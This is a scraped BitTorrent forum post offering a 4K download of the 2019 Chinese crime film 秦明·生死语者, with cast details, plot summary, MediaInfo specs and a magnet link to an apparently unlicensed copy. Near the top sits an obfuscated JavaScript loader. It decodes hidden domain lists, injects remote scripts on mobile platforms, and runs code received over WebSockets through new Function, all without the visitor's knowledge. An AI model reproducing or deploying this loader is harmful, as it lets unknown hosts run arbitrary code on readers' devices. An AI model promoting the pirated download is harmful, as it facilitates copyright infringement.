秦明·生死语者.迅雷下载[WEB-MP4/8.54GB][4K-2160P]

版主小s 6天前 314

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 秦明·生死语者 / 生死语者·秦明 / Whisper of Silent Body

◎年 代 2019

◎产 地 中国大陆

◎类 别 悬疑 / 犯罪

◎语 言 汉语普通话

◎上映日期 2019-06-14(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt10423912/

◎豆瓣评分 4.1/10 (15157人评价)

◎豆瓣链接 https://movie.douban.com/subject/27090753/

◎片 长 104分钟

◎导 演 李海蜀 Haishu Li (id:1321164)

黄彦威 Yanwei Huang (id:1321340)

◎编 剧 秦明 Ming Qin (id:1404646)

◎演 员 严屹宽 Yikuan Yan (id:1313653)

代斯 Daisy (id:1361029)

耿乐 Le Geng (id:1274576)

郝劭文 Shaowen Hao (id:1314167)

杜鹃 Juan Du (id:1323516)

秦明 Ming Qin (id:1404646)

陈欣淇 Julie Tan (id:1344518)

吕东 Dong Lv (id:1410768)

◎标 签 法医 / 悬疑 / 犯罪 / 秦明 / 推理 / 中国大陆 / 2019 / 悬念

◎简 介

影片根据法医秦明小说《尸语者》改编。讲述被誉为“鬼手佛心”的“尸语者”秦明(严屹宽饰)解剖过 1000 多具尸体,从未出错,因意外发现泡在福尔马林里6年的“无语体师”死于他杀,引发媒体质疑误判,被舆论推至风口浪尖之上。在尸体留下的线索指引下,秦明在实习助手嘉嘉(代斯饰)和刑警队长林涛(耿乐饰)的协助调查下发现了尘封 16 年的雪灾杀人案、误判 6 年的“无语体师”他杀案、悬而无果的 IT 男肺炸案背后的秘密。经历了这一系列变故的秦明最终成为了一名“为死者言,为生者权”的“生死语者”。

General

Complete name : 秦明·生死语者.Whisper.[email protected]

Format : MPEG-4

Format profile : Base Media

Codec ID : isom (isom/iso2/mp41)

File size : 8.54 GiB

Duration : 1 h 44 min

Overall bit rate : 11.7 Mb/s

Writing application : Lavf58.32.104

Video

ID : 1

Format : HEVC

Format/Info : High Efficiency Video Coding

Format profile : [email protected]@Main

Codec ID : hev1

Codec ID/Info : High Efficiency Video Coding

Duration : 1 h 44 min

Bit rate : 11.5 Mb/s

Width : 3 840 pixels

Height : 1 608 pixels

Display aspect ratio : 2.40:1

Frame rate mode : Constant

Frame rate : 24.000 FPS

Color space : YUV

Chroma subsampling : 4:2:0

Bit depth : 8 bits

Bits/(Pixel*Frame) : 0.078

Stream size : 8.40 GiB (98%)

Codec configuration box : hvcC

Audio

ID : 2

Format : AAC LC

Format/Info : Advanced Audio Codec Low Complexity

Codec ID : mp4a-40-2

Duration : 1 h 44 min

Bit rate mode : Constant

Bit rate : 192 kb/s

Channel(s) : 2 channels

Channel layout : L R

Sampling rate : 44.1 kHz

Frame rate : 43.066 FPS (1024 SPF)

Compression mode : Lossy

Stream size : 142 MiB (2%)

Default : Yes

Alternate group : 1


TAGS 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:FE21C5846B1E2D19E4EFFF6C2CAED07B46839AE7
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (2)

你可以在 登录 or 注册 后,对此帖发表评论!

返回